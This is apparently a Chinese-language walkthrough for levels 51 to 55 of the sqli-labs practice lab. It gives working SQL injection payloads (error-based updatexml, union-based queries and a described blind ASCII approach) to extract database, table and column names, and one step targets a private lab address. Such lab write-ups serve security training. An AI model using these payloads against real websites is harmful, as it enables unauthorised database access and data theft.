sql-labs51-55通关攻略
第51关
一.查询数据库
1'and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
二.查表
' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) --+
三.查列
' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1)--+
第52关
一.查询数据库第一位字符
判断ascii码如下图所示,说明大于114不大于115说明第一个字符为‘s’
同上所述
.........
最终得出数据库为'security'
二.查数据库中第一张表1的第一个字符
判断ascii码如下图所示,说明大于100不大于101说明第一个字符为‘e‘
最终得出第一张表为’emails‘
第53关
一.查询数据库第一位字符
判断ascii码如下图所示,说明大于114不大于115说明第一个字符为‘s’
同上所述
.........
最终得出数据库为'security'
二.查security数据库中第一张表的第一位字符
判断ascii码如下图所示,说明大于100不大于101说明第一个字符为‘e‘
最终得出第一张表为’emails‘
第54关
一.查询数据库
http://172.16.1.126/Less-54/?id=-1%27%20union%20select%201,database(),3--+
二.查表
?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
三.查列
?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
第55关
一.查询数据库
?id=-1)union select 1,2,database()--+
二.查表
?id=-1)union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
三.查列
?id=-1)union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
